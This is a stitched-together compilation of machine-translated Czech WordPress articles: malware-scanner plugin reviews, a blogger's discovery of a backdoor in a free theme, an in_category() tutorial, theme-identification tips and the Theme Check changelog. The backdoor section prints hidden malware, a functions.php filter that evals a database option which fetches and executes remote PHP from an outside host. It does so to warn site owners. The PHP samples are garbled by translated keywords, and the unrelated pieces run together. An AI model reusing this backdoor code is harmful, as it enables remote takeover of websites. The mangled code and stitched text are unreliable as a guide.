Pravidelně kontrolujeme dostupnost webu škodlivé viry Je to nutné, to je první přikázání každého webmastera, který má sebeúctu. I když používáte čisté téma Twenty Eleven, není pravda, že se časem také nenakazilo. K tomuto jevu může (a nejčastěji dochází) dojít díky tomu, že samotný WordPress engine byl původně navržen pro online publikování. Takže nikdy neuškodí znovu zkontrolovat a vytvořit kopii webu a databáze.

Například jsem (samozřejmě po nějaké době) pro sebe udělal jeden závěr - stačí dobrý hostitel a vaše problémy se zálohováním zmizí samy. Nepotřebuji nyní zálohovat databázi nebo web - hostitel udělá vše za mě a v automatický režim. Kdykoli, pokud si to přejete, si můžete objednat kopii libovolné části svého blogu (a nejen), stáhnout si tuto kopii nebo obnovit blog přímo z ovládacího panelu. To znamená, že nemusím stahovat zálohu, vše se děje automaticky - zálohování, obnovení atd. To je výhodné, protože mohu nejen denně, ale i každou hodinu sledovat, kdy se na mém blogu objevil virus, a podle toho přijmout opatření k jeho odstranění.

Začnu dobrou zprávou – minimálně dva pluginy, které jsem použil, se rozdávají dobré výsledky o detekci a lokalizaci škodlivého kódu. Jedná se o pluginy AntiVirus a Exploit Scanner. Neuvěříte, kolik škodlivého kódu je na vašem blogu! Všechny výsledné informace po kontrole ale neberte jako dogma – mnoho řádků, které tyto pluginy detekují, ve skutečnosti neznamenají nic špatného. Plugin jen zpochybňuje některé řádky, to je vše. Abyste se o tom ujistili, ručně zkontrolujte fragmenty, které plugin označil jako škodlivé. Takže při kontrole pomocí pluginu Antivirus Ukázalo se, že i jednoduché volání funkce get_cache_file () je pluginem považováno za podezřelé. Takže všechny výsledky kontroly budou muset být sledovány ručně. Ale například toto je skutečně infikovaný odkaz a je třeba jej odstranit:

Jak víte, zda je to virus nebo jak by to mělo být? Vše je velmi jednoduché - porovnejte svou čistou šablonu (pokud nějakou máte) a porovnejte ji (soubor po souboru) s tou, která je nainstalovaná a již prošla nějakými změnami. Není nutné provádět přímé srovnání přímo, stačí pomocí vyhledávání zkontrolovat, zda vaše prázdná šablona obsahuje řádek, který plugin zvýraznil. Pokud ano, klikněte na tlačítko „Toto není virus“ a tento řádek nebude při příští kontrole zohledněn.

A zde je příklad druhého pluginu, který jsme testovali - Využití skeneru

Jak je vidět, vše je zde mnohem zanedbanější. Pro mě byl tento výsledek šokující. Ale to není všechno. Plugin má funkci zvanou check. Pokud jej tedy zapnete, ukáže se, že blog by se měl skládat z textu a maximálně pár CSS tabulek. Zdá se mi tedy, že to zde autor pluginu s bezpečností jednoznačně přehnal. Je dobré, že plugin jednoduše zobrazuje podezřelé infikované fragmenty a nečistí je.

Po analýze všech žlutě zvýrazněných řádků snadno odhalíte malware (škodlivý kód), no, sami se rozhodněte, co s ním dál dělat. Způsob čištění je stále stejný - porovnejte vybraný kód se zálohou webu (viz) a pokud zjistíte nesrovnalosti, zjistěte, zda jste to udělali sami, nebo to udělal někdo za vás, což znamená, že to již není dobré a se může ukázat jako virus. Dokonce i vývojáři WordPressu doporučují pomocí tohoto pluginu zkontrolovat, zda váš web neobsahuje škodlivý kód. Existují ale takové neškodné vložky například do těla iframe, které plugin také dokáže identifikovat jako infikovaný kód. Ale ve skutečnosti bez těchto řádků nebude tato oblast vašeho blogu fungovat správně.

Jak se vůbec může malware dostat do souborů blogu a co to podle definice je? Slovo malware doslova znamená - zlomyslný software , z anglického škodlivého softwaru. Jedná se o jakýkoli software, který lze použít k neoprávněnému přístupu na stránky a jejich obsah. Pravděpodobně si představujete, že pro průměrného hackera nebude hackování webové stránky obtížné, zvláště po registraci. Poté můžete obsah blogu libovolně upravovat – bylo by to vzdělávací.

Škodlivý malware lze také vložit do pluginů, ze kterých instalujete neznámý zdroj, a ve skriptech, které si také někdy vezmete bez kontroly, ale důvěřujete autorovi. Nejnebezpečnějším malwarem je odkaz na autora jakéhokoli modulu, který jste na web nainstalovali. A pokud vás autor sám neupozornil, že takový odkaz existuje, pak se jedná o čistý virus.

Ano, nainstaloval jsem to na testovací blog nové téma a po smazání jednoho neškodného odkazu na jakýsi pánský klub v suterénu webu se přestal vůbec otevírat a na hlavní stránce se objevil nápis - „Nemáte právo mazat odkazy.“ Zde je zdarma téma pro vás. O tom, jak takové levicové odkazy vytrhnout, si můžete přečíst.

Vaši databázi lze také použít ke spuštění kódu obsahujícího virus. Spamové odkazy jsou také velmi často přidávány do příspěvků nebo komentářů. Takové odkazy jsou obvykle skryté, když Nápověda CSS aby je nezkušený správce neviděl, ale vyhledávací systém okamžitě je odliší. Samozřejmě zde přichází na řadu jakýkoli antispam, například ten samý, který je mnohokrát licencován, testován a dvakrát kontrolován. Hacker si může stáhnout soubory s příponami obrázkových souborů a přidat je do kódu vašich aktivovaných pluginů. Proto i když soubor nemá příponu php, kód v tomto souboru lze spustit.

Existuje ještě jeden jednoduchý nástroj, se kterým jsem se začal seznamovat s malwarem – plugin Theme Authenticity Checker (TAC). Jedná se o lehký a poměrně účinný nástroj, ale kontroluje pouze vaše témata, a to i neaktivní. Nedotýká se zbytku adresářů, a to je jeho nevýhoda. To je to, co mi testování mého aktuálního tématu s tímto pluginem dalo:

Dvě varování v aktivním vláknu a nic víc. Neexistuje žádný škodlivý kód. Mimochodem, toto jsou odkazy, které jsem sám vložil na radu Google - pro zlepšení kvality úryvku (zobrazení osobních údajů, adresy organizace atd.). Ale to je pouze kontrola souborů motivů a budete muset zjistit, co se dělá v jiných adresářích, buď pomocí jiných pluginů nebo online služeb. Například služba (je opravdu důvěryhodná), jako je Yandex Webmaster nebo podobná služba v Googlu. Mají funkci kontroly jakéhokoli webového zdroje na přítomnost škodlivých inkluzí a dělají to efektivně. Pokud vám to ale nestačí, porovnejte výsledky s výsledky na jiných službách a vyvodte závěry.

Z nějakého důvodu chci věřit Yandexu, ne pluginům. Dalším dobrým zdrojem je http://2ip.ru/site-virus-scanner/. Po kontrole jednoho z mých blogů jsem našel toto:

Zde můžete také zkontrolovat, zda jednotlivé soubory neobsahují škodlivý kód, pokud máte nějaké pochybnosti. Obecně platí, že služba není špatná.

Ze všeho, co bylo řečeno, bych vyvodil následující závěry:

1. Abyste zabránili výskytu škodlivého kódu, musíte v první řadě využít osvědčené služby pro stahování souborů – pluginy, motivy atp.

2. Dělejte to pravidelně zálohy vše, co web obsahuje – databáze, obsah, admin panel, nahrané soubory třetích stran, včetně.

3. Využijte aktualizace, které WordPress nabízí. Alespoň neobsahují viry, i když ne vždy jsou funkčně opodstatněné. Aktualizací však odstraníte všechny viry, které mohou být přítomny.

4. Bez lítosti smažte nepoužívaná témata, pluginy, obrázky a soubory – toto je další úniková cesta pro malware, o které možná nikdy ani netušíte.

5. Správně chraňte heslem své přístupy k FTP, přihlaste se do PhpAdmin, do panelu administrátora a obecně tam, kde by neměl mít přístup nikdo kromě vás.

6. Snažte se (i když vaše touha je velká jako nebe) neměnit nebo nahrazovat základní soubory WordPress – vývojáři lépe vědí, co by mělo fungovat a jak.

7. Po zjištění a odstranění virů změňte všechna hesla. Myslím, že budete mít velkou touhu vytvořit heslo o 148 znacích v různých registrech a se speciálními znaky. Ale nenechte se příliš unést složitá hesla, můžete ho ztratit a pak budete muset vše obnovit, což není moc příjemné.

Všechny tyto metody a komponenty, které jsem popsal a které vám pomohou zbavit se virů, jsou samozřejmě zdarma, samozřejmě téměř domácí výroby a samozřejmě neposkytují 100% záruku, že vaše stránky budou vyčištěny od škodlivých vložky. Proto, pokud se již obáváte čištění svého blogu, je lepší kontaktovat profesionály, například službu Sucuri(http://sucuri.net/). Zde budou vaše stránky důkladně monitorovány, budou poskytnuta praktická doporučení, která vám budou zaslána dopisem, a pokud nechcete stránky uklízet sami, pak jsou vám k dispozici specialisté, kteří udělají vše v nejlepším možném cesta do 4 hodin:

No a takhle vypadá můj testovací blog po sledování, a to i přesto, že jiné metody (domácí) vykazují vždy jiné výsledky. Jak vidíte, test je zdarma, ale pokud jsou detekovány viry, měli byste zaplatit za jejich odstranění bez poškození webu (pokud samozřejmě nejste guru v čištění svého blogu od malwaru).

Ještě jednou zdůrazňuji – hackeři nespí, viry se neustále aktualizují a není možné vše sledovat sami. Všechny inovace jsou tak pečlivě skryté a maskované, že je může odhalit pouze tým! profesionálové, a ne blogger samouk, kterým mnozí jsou. To je důvod, proč je ruční detekce a odstranění malwaru tak neúčinná: žádná zkušenost neznamená žádný výsledek, ale existuje virus. Použití licencované programy a svěřit odstranění nebezpečí profesionálům

Dobrý den, přátelé. Jsi si jistý, že je to zdarma? WordPress šablona, který používáte pro své weby a blogy, je opravdu bezpečný a neobsahuje skryté hrozby a škodlivý kód? Jste si tím zcela jistý? Absolutně?)

Myslíte si, že jste šablonu prošli , odstranili z ní skryté odkazy a práce je hotová. Pravidelně skenujete soubory webu pomocí antiviru, díváte se do nástrojů pro webmastery Yandex na kartě Zabezpečení a s úlevou tam vidíte zprávu: “ Na stránce nebyl zjištěn žádný škodlivý kód«.

To jsem si taky myslel. Nerad bych tě naštval, ale...

Skrytý nebezpečný kód ve bezplatných šablonách WordPress

Toto je dopis, který jsem minulý týden obdržel e-mailem od své hostitelské společnosti. Nedávno zavedli pravidelnou kontrolu všech souborů webu, aby hledali škodlivý obsah, a našli tento obsah u mě!

Všechno to začalo, když jsem jednou odpoledne šel na svůj web a nemohl jsem ho spustit – objevila se urážlivá zpráva o tom, že soubory s příponou php nebyly nalezeny. Když jsem se trochu napnul, šel jsem prostudovat obsah složky s webem na hostingu a okamžitě jsem objevil problém - můj soubor šablony fuctions.php byl přejmenován na functions.php.malware, což jako by nejednoznačně napovídalo - antivirus byl pracuji zde nebo něco takového) Když jsem šel na poštu, našel jsem výše uvedenou zprávu od hostitele.

První věc, kterou jsem samozřejmě udělal, bylo začít kontrolovat tento soubor, studovat jeho obsah, skenovat jej všemi druhy antivirů, desítkami online služby pro kontrolu virů atd. — nakonec se nic nenašlo, všichni jednomyslně tvrdili, že spis je zcela bezpečný. Samozřejmě jsem hostiteli vyjádřil své pochybnosti s tím, že jste něco zpackal, ale pro každý případ jsem ho požádal o poskytnutí zprávy o zjištění škodlivého kódu.

A tohle mi odpověděli

Šel jsem na google informace o tomto kódu a myslel jsem vážně...

Jak najít kousek škodlivého kódu v šabloně

Jak se ukázalo, jde o skutečně netriviální techniku, která umožňuje zájemcům přenášet data na vaše stránky a měnit obsah stránek bez vašeho vědomí! Pokud používáte bezplatnou šablonu, pak Vřele doporučuji zkontrolovat váš functions.php následující kód:

add_filter('the_content', '_bloginfo', 10001);
funkce _bloginfo($content)(
globální $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
vrátit $co;
) else return $content;
}

I při mé velmi povrchní znalosti php je jasné, že se vytváří určitý filtr vázaný na globální proměnná příspěvku a obsah je odpovědný za zobrazování obsahu pouze na stránkách blogových příspěvků (podmínka is_single). Už je to podezřelé, že? No, teď se podívejme, co z toho vyjde. tento kód na našem webu.

Velmi podezřele vypadá i zajímavá možnost blogoption požadovaná v databázi. Pojďme do naší databáze Data MySQL a najděte tam tabulku s názvem wp_options, pokud jste nezměnili předpony, bude to ve výchozím nastavení vypadat takto. A v něm najdeme řádek, který nás zajímá, zvaný blogoption

Jaká krása! Vidíme následující možnost


return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Tito. Z určitého webu (a ruského, pozor) vracejí obsah, který může obsahovat cokoliv! Libovolný počet odkazů, škodlivých kódů, pozměněného textu atd. Když vstoupíte na samotný web, zobrazí se vám chyba přístupu 403, což není překvapivé. Tuto možnost jsem samozřejmě také z databáze odstranil.

Podle informací od obětí se přesný obsah vašeho článku obvykle vrací pouze s jednou úpravou – namísto jakékoli tečky „.“ v textu byl skrytý otevřený odkaz! A mimochodem, tato možnost se zapíše do databáze při instalaci samotné šablony a poté se kód, který to provádí, úspěšně zničí. A s takovým svinstvem jsem žil dva roky a za celou tu dobu mi tuto hrozbu neidentifikoval ani jeden antivirus nebo služba. Abych byl upřímný, nevšiml jsem si, zda tento trik pro mě někdy fungoval, nebo zda můj bezpečnostní plugin tuto funkci zablokoval (nebo možná jedna z aktualizací WordPress tuto díru uzavřela), ale stále je to nepříjemné.

Morálka o volném sýru

Jak se vám líbí propracovanost našich „překladatelů“ šablon (nebo těch, kteří je dávají do svých katalogů)? To není pro vás, abyste vystřihovali odkazy z patičky) Škoda, že si nepamatuji, odkud jsem stáhl svou šablonu, bylo to dávno, jinak bych určitě napsal pár láskyplných. A kdybych v té době měl stejnou zkušenost jako nyní, rozhodně bych nepoužil šablonu zdarma, v krajním případě bych ji nestahoval z neznámých zdrojů!

Je snazší koupit si nějakou oficiální prémiovou šablonu za 15-20 babek a žít v klidu s vědomím, že v ní nejsou žádné díry ani šifrované odkazy, a i když tam jsou zranitelnosti, vývojáři určitě vydají aktualizaci, ve které tyto díry budou ZAVŘENO. ( Mimochodem, Artem nedávno zveřejnil článek, kde mluví o prémiových šablonách a dokonce rozdává propagační kódy na brutální slevy pro ty, kteří mají zájem)

Představme si, že zobrazujete záznamy a potřebujete je změnit vzhled v závislosti na kategorii. Máte například blok „O AUTOROVI“, který zobrazuje informace o autorovi článku, ale nechcete tento blok vidět například pod příspěvky z kategorie, ve které to není potřeba. Můžete také zakázat komentování v určitých kategoriích, zobrazování miniatur atd. Vše záleží na vašich potřebách a fantazii. Osobně tuto podmínku využívám velmi často.

Chcete-li filtrovat záznamy v závislosti na kategorii, funkce pomůže - in_category(). Tato funkce kontroluje, zda aktuální nebo zadaný záznam patří do požadované kategorie nebo několika kategorií. Častěji tuto funkci výstup v souboru single.php, protože je zodpovědný za výstup záznamů.

Nejjednodušší způsob použití funkce by vypadal asi takto. Tento kód přidáme do souboru single.php a v případě potřeby jej uzavřeme do značek PHP.

PHP tagy vypadají takto:

Pokud váš motiv používá převážně HTML kód, vložte níže uvedený kód beze změn. Pokud používáte hlavně PHP, pak lze značky, které obsahují kód, odstranit.

V tomto kódu nastavíme podmínku, že pokud aktuální záznam patří do kategorie s ID - 12, tak potřebujeme něco zobrazit. Do složených závorek můžete přidat, co chcete. Měl by to být kód PHP, pokud je to obtížné a potřebujete přidat kód HTML, rozbijte kód pomocí stejných značek PHP a kód bude vypadat takto:

//sem píšeme běžný HTML kód nebo jen text.

Chcete-li zjistit ID kategorie, musíte přejít na seznam kategorií na panelu administrátora a umístit kurzor na požadovanou kategorii. Ve spodní části okna prohlížeče na pravé straně bude odkaz, který bude mít něco jako ID=1, to znamená, že ID této kategorie je 1.

Pokud potřebujete zadat několik kategorií, uveďte je oddělené čárkami. Možná budete také muset vytvořit podmínku „IF - THEN“, pak bude kód vypadat takto:

Představte si, že potřebujete zobrazit miniaturu položky v kategorii 12 a první obrázek z textu v dalších příspěvcích z jiných kategorií. Stává se to a jak to udělat? Pomocí výše uvedeného kódu. O zobrazení prvního obrázku ze záznamu si můžete přečíst v článku -

Nyní chci ukázat ještě jednu funkci, kterou lze k této funkci přidat. Stává se, že kategorie mají podkategorie, tedy dětské kategorie. A pokud záznam patří do jedné z podkategorií, pak ho podmínka obejde. Pokud to potřebujete, nemusíte se ničeho dotýkat, ale pokud by přesto podmínka měla fungovat pro podkategorie, musíte k podmínce přidat dodatek. Nejprve musíte k samotné podmínce přidat následující část - || post_is_in_descendant_category(12). Toto je volání naší nové funkce, která bude kontrolovat podle podkategorií. Hotový kód bude vypadat takto:

Aby mohla nová funkce začít fungovat, musíte přidat samotný kód této funkce, to znamená, že ji musíte napsat. Chcete-li to provést, vyhledejte soubor ve složce s aktivním motivem funkce.php, který obsahuje uživatelem definované funkce. Pokud nejste obeznámeni s PHP, musíte přidat kód na úplný konec souboru, ale pokud existuje uzávěrka PHP značka - ?> , pak jej musíte přidat před něj. Samotný kód vypadá takto:

Funkce post_is_in_descendant_category($cats, $_post = null) ( foreach ((pole) $cats jako $cat) ( // get_term_children() přijímá pouze celočíselné ID $descendants = get_term_children((int) $cat, "category"); pokud ($descendants && in_category($descendants, $_post)) return true; ) return false; )

Pokud je vše provedeno správně, pak vaše podmínka vybere příspěvky podle určitých kategorií a jejich podkategorií.

Tento článek jsem začal psát už dávno, ale nemohl jsem se dostat k jeho dokončení, vyrušila mě nejprve jedna věc, pak další. Konečně je článek hotový a možná pomůže mnoha lidem vyřešit problém.

To je vše, děkuji za pozornost. 🙂

Přemýšleli jste někdy o tom, jaké téma používá web?

Často se při hledání ideálního tématu díváme na jiné dokončené projekty, abychom našli něco podobného nebo vytvořili vlastní web na stejné téma, pouze s vlastním individuálním designem.

V tomto tutoriálu vám ukážeme, jaké nástroje a triky můžete použít, abyste zjistili, jaké téma váš web WordPress používá.

Metoda 1. Ověřovací web IsItWP

Nejjednodušší způsob je jít na isitwp.com a podívat se na stránky, které vás zajímají.

Jedná se o online nástroj, který vám ukáže, jaké téma WordPress používá a zda se na tomto webu vůbec používá.

Pokud na webu běží WordPress, IsItWP se pokusí zjistit název aktuálního motivu.

Pokusí se také zjistit, jaké aktivní pluginy se na webu používají:

Pokud budete mít štěstí a nejedná se o vlastní nebo podřízené téma, IsItWP zobrazí jeho název a toto téma pak můžete najít ve vyhledávačích.

Metoda 2. Určete ručně

Někdy vlastníci nebo vývojáři webu změní název webu WordPress témata. V tomto případě vám nástroje jako IsItWP nebudou moci pomoci.

Ale i kdyby ano, v kódu webu mohou být různé stopy, které vám pomohou zjistit, jaký druh motivu je nainstalován.

Pojďme se podívat.

Každé téma WordPress musí mít soubor styl.css. Tento soubor obsahuje uvnitř záhlaví, které obvykle označuje název motivu, autora motivu, verzi a web vývojáře motivu. Uvádí také další šablony stylů CSS, které téma používá.

Chcete-li tento soubor najít, musíte nejprve přejít na samotný web. Klikněte pravým tlačítkem někam na hlavní stránku a přejděte na zobrazení zdrojového kódu ( Zobrazit zdroj stránky).

Zdrojový kód se otevře v prohlížeči na nové kartě. domovská stránka místo.

Nyní musíte najít řádek kódu, který vypadá nějak takto:

Chcete-li úkol usnadnit, můžete na této kartě vyhledávat pomocí kódu fragmentu " témata". Toto je část z adresáře, kde styl.css.

Takto zjistíte cestu, kde se nachází soubor style.css a tento soubor můžete otevřít přímo v prohlížeči v nové záložce.

V horní části style.css bude záhlaví s nadpisem (o kterém jsme mluvili výše). Toto jsou servisní informace k tématu. Vypadá to nějak takto:

/* Název motivu: Název motivu URI motivu: https://example.com Autor: ThemeAuthorName Autor URI: https://example.com Popis: My Theme je flexibilní téma WordPress navržené pro portfoliové weby Verze: 1.1.47 Licence: GNU General Public License v2 nebo novější URI licence: http://www.gnu.org/licenses/gpl-2.0.html Textová doména: hestia Tagy: blog, vlastní-logo, portfolio, e-commerce, rtl-language-support , post-formáty, rozvržení mřížky, jeden sloupec, dva sloupce, vlastní pozadí, vlastní barvy, vlastní záhlaví, vlastní nabídka, hlavička hlavního obrázku, hlavní obrázky, flexibilní záhlaví, plná šířka -template, sticky-post, theme-options, threaded-comments, translation-ready */

Z tohoto bloku můžete zjistit název tématu a adresu vývojáře. Pak už zbývá jen najít toto téma na internetu.

Metoda 3. Jak najít nadřazené téma

Mnoho webů používá k přizpůsobení vzhledu podřízené motivy. A to je zcela správný přístup.

V tomto případě, pokud jste našli soubor styl.css z podřízeného motivu bude jeho záhlaví obsahovat informace o nadřazeném motivu:

/* Název motivu: Téma Moje dítě Popis: Jen dětské téma Autor: Peter Smith URL autora: Sem napište adresu URL blogu nebo webu autora Šablona: hestia Verze: 1.0 Licence: GNU General Public License v2 nebo novější URI licence: http :/ /www.gnu.org/licenses/gpl-2.0.html Textová doména: mé-child-theme */

Ve výše uvedeném příkladu je nadřazený motiv označen parametrem " Šablona“, což znamená, že toto podřízené téma používá nadřazené téma „Hestia“.

O nadřazeném motivu se také můžete dozvědět ze zdrojového kódu popsaného v Metodě 2. V kódu najdete odkaz na soubor style.css nejen z podřízeného motivu, ale také z nadřazeného motivu.

Ale nezapomeňte, že vývojář se mohl pokusit změnit všechny hlavičky pro style.css na své vlastní, v takovém případě bude velmi obtížné určit původní téma.

Plugin pro kontrolu motivu je snadný způsob, jak otestovat motiv a ujistit se, že je v souladu s nejnovějšími standardy kontroly motivů. S tím, můžeš spusťte na svém motivu všechny stejné automatizované testovací nástroje, které WordPress.org používá pro odesílání motivů.

Testy se spouštějí přes jednoduché admin menu a všechny výsledky se zobrazují najednou. To je velmi užitečné pro vývojáře témat nebo kohokoli, kdo se chce ujistit, že jejich téma podporuje nejnovější standardy a postupy pro témata WordPress.

Jak povolit formátování Trac

Tým Theme Review používá tento plugin při kontrole motivů a kopírování/vkládání výstupů do tiketů trasování, systém trace má svůj vlastní značkovací jazyk.
Chcete-li povolit formátování tras v Theme-Check, musíte definovat několik proměnných v wp-config.php:
TC_PRE a TC_POST se používají jako záhlaví a zápatí lístku.
Příklady:
define('TC_PRE', 'Recenze tématu:[]
— Témata by měla být zkontrolována pomocí „define(\‘WP_DEBUG\‘, true);“ v wp-config.php[]
— Témata by měla být přezkoumána pomocí testovacích dat z kontrolních seznamů témat (TC)
——
‘);

Define("TC_POST", "Neváhejte a využijte níže uvedené kontaktní údaje, pokud máte nějaké dotazy, komentáře nebo zpětnou vazbu:[] [] * Zanechte komentář k tomuto tiketu[] * Pošlete e-mail na e-mail Theme Review seznam[] * Použijte IRC kanál #wordpress-themes na Freenode.");

Li buď z těchto dvou proměnných jsou definovány, vedle zaškrtávacího políčka se objeví nové zaškrtávací políčko Zkontroluj to! knoflík.

FAQ

Jak je to s čísly verzí?

Číslo verze je datum revize pokynů použitých k jejímu vytvoření.

Proč označuje něco jako špatné?

Neoznačuje to „špatné“ věci jako takové. Kontrola motivu je navržena jako nedokonalý způsob testování souladu s pokyny pro kontrolu motivu. Ne všechna témata musí splňovat tyto pokyny. Účelem kontrolního nástroje je zajistit, aby témata nahraná do centrálního úložiště témat WordPress.org splňovala nejnovější standardy témat WordPress a fungovala na široké škále webů.

Mnoho webů používá přizpůsobená témata, a to je naprosto v pořádku. Ale témata, která jsou určena pro použití na mnoha různých typech webů veřejností, musí mít určitou minimální úroveň schopností, aby bylo zajištěno správné fungování v mnoha různých prostředích. Pokyny k přezkoumání tématu jsou vytvořeny s ohledem na tento cíl.

Tato kontrola témat není dokonalá a nikdy nebude. Je to pouze nástroj, který pomáhá autorům témat nebo komukoli jinému, kdo chce své téma zdokonalit. Všechna témata odeslaná na WordPress.org jsou ručně zkontrolována týmem odborníků. Automatizovaná kontrola témat má být pouze užitečným nástrojem, nikoli absolutním systémem měření.

Tento plugin ne rozhodnout o použitých pokynech. Jakékoli problémy s pokyny pro kontrolu konkrétních témat by měly být prodiskutovány na webu Make Themes.

Recenze

Toto je skvělý plugin pro každého, kdo opravdu rád vyvíjí téma WordPress a úspěšně testuje základní standardy WordPress. Chyby jsou odděleny v "Povinné", "Varování", "Doporučeno" a "Informace". Poskytněte také základní informace o této chybě a umožní vám pochopit, kde je problém.

Účastníci a vývojáři

"Theme Check" je projekt s otevřeným zdrojový kód. Na vývoji pluginu se podíleli následující přispěvatelé:

Účastníci

Seznam změn

20190801.1

  • Opravte chybějící kontrolu nonce a kontrolu nonce na stránce správce. podporuje Stevena Sterna za nahlášení problému týmu pluginů. Ačkoli se technicky jedná o CSRF, nevyplývá z něj žádná zranitelnost, protože jediná věc, kterou lze s formulářem udělat, je naskenovat téma.

20190208.1

  • Přidejte nové styly pro editor bloků. Viz https://meta.trac.wordpress.org/ticket/3921

20160523.1

  • Oprava názvů témat s pomlčkami
  • Změny odstraňující komentáře
  • Mnoho změn provedených týmem pro kontrolu tématu a dalšími. Úplný seznam změn najdete na Github.

20151211.1

  • Plná synchronizace s Githubem a všemi změnami, které se tam udály.
  • Vydání pro zastaralé funkce 4.4.

20140929.1

  • Přidány nové kontroly a aktualizace od Franka Kleina ve společnosti Automattic. Díky Franku!
  • Aktualizované seznamy zastaralých funkcí
  • Kontrola přizpůsobení: Všechna nastavení add_settings musí kvůli bezpečnosti používat zpětná volání dezinfekce
  • Kontrola území pluginu: Motivy nesmí registrovat typy příspěvků nebo taxonomie ani přidávat krátké kódy pro obsah příspěvku
  • Widgety: Volání na register_sidebar musí být voláno z akčního háku widgets_init
  • Title: tagy musí existovat a ne mají v sobě něco jiného než volání wp_title()
  • CDN: Kontroluje použití běžných CDN (pouze doporučeno)
  • Poznámka: Změněny identifikátory URI pluginu a autora, protože staré identifikátory URI jsou neplatné. Ty se mohou v budoucnu znovu změnit, URI mého vlastního webu jsou pouze dočasně.

20131213.1

  • Opravené chyby, které plugin nezobrazuje, a nesprávně dává všemu výsledek „pass“.

20131212.1

  • Aktualizováno na 3.8
  • Většina souborů se změnila pro lepší podporu I18N, takže jazykové soubory byly dočasně odstraněny, dokud nebude možné překlad zopakovat.

20121211.1

  • Aktualizováno na 3.5
  • Tlačítko Odebrat Paypal.

20110805.1

  • Kontroly TimThumb odstraněny.
  • Snímek obrazovky je nyní ve výsledcích zobrazen jako náhled s velikostí souborů a rozměry.

20110602.2

  • Nové funkce seznamu souborů skryté složky nyní detekovatelné.
  • Lepší fopen kontroly.
  • Náraz verze TimThumb

20110602.1

  • Kontrola stylu zakončení řádků DOS/UNIX je nyní požadavkem pro správné nahrávání motivu.
  • Timthumb verze bump
  • Několik oprav hlášených GaryJ
  • 3.2 přidány zastaralé funkce

20110412.1

  • Opravte regulární výrazy
  • Přidána kontrola nejnovějšího hacku vložení zápatí.
  • Opravte kontrolu značek, abyste správně používali novou funkci obsahu
  • Synchronizace všech změn provedených pro kontrolu tématu wporg uploader.
  • Aktualizovaný příspěvek šeků 3.1. přidána kontrola snímku obrazovky do svn.
  • Opravit kontrolu odkazů, aby v některých případech nevrátila falešné selhání
  • rm jedna z kontrol, která způsobuje problémy na wporg uploaderu (a která je také zbytečná)
  • Přesuňte nepotřebné funkce z checkbase do main.php.
  • Pouze drobné změny formátování (mezery a podobně)
  • Přidat kontrolu pro wp_link_pages() + opravit kontrolu eval().

20110219.2

  • Sloučené nové rekvizity uživatelského rozhraní Gua Bob
  • Poslední testovaný motiv je vždy předem vybrán v seznamu motivů.
  • Opravena chyba php v admin_menu.php

20110219.1

  • Změny viz protokol odevzdání.

20110201.2

  • Opravy chyb uživatelského rozhraní pro příspěvky na fóru Mamaduka.
  • Textová doména kontroluje dvacet a žádnou doménu.
  • Opravte div nezavírající rekvizity Mamaduka.

20110201.1

  • i18n funguje
  • sr_RS de_DE ro_RO langs rekvizity Daniel Tara a Emil Uzelac.
  • Přidána podpora podřízeného motivu, kontroly provedené proti nadřazenému A podřízenému za běhu.
  • Pro recenzenty bylo přidáno tlačítko pro formátování sledování.

20101228.3

  • Poslední revize pro 3.1 (doufejme)
  • Návrh čipů na kontrolu zahrnutí searchform.php (ne
    perfektní, ale je třeba hledat další příklady).
  • add_theme_page je povinný, všechny ostatní označeny a zobrazeny s řádkem
    čísla.
  • Většinou internacionalizované, nyní potřebuje překlady.
  • Oprava chyb.

20101228.2

  • Přidána kontrola menu.
  • ThemeURI OuthourURI přidán do výsledků.
  • Spousta malých oprav.
  • Zahájen překlad.

20101228.1

  • Opravte kontrolu filtru embed_defaults a kontrolu dat souboru šablony stylů.

20101226.1

  • Redesign celého systému, který umožňuje snadnější synchronizaci s uploaderem WordPress.org. Mnoho dalších doplňků/odčítání/změn.
  • Byly přidány pokyny pro WordPress 3.1, které pomáhají autorům motivů zajistit kompatibilitu pro nadcházející vydání.

20101110.7

  • Znovu přidané malware.php kontroluje fopen a file_get_contents (INFO)
  • opraveno několik nedefinovaných chyb indexu.

20101110.4_r2

  • Opravené varování: Nesprávný počet parametrů pro stristr()

20101110.4_r1

  • Přidána ozvěna do navržené.php

20101110.4

  • Opraveno zastaralé volání funkce get_plugins()

20101110.3

  • Opraven nedefinovaný index.

20101110.2

  • Chybějící< in main.php
  • Přidány podmíněné kontroly pro license.txt NEBO licenční značky ve style.css
  • vylepšení uživatelského rozhraní.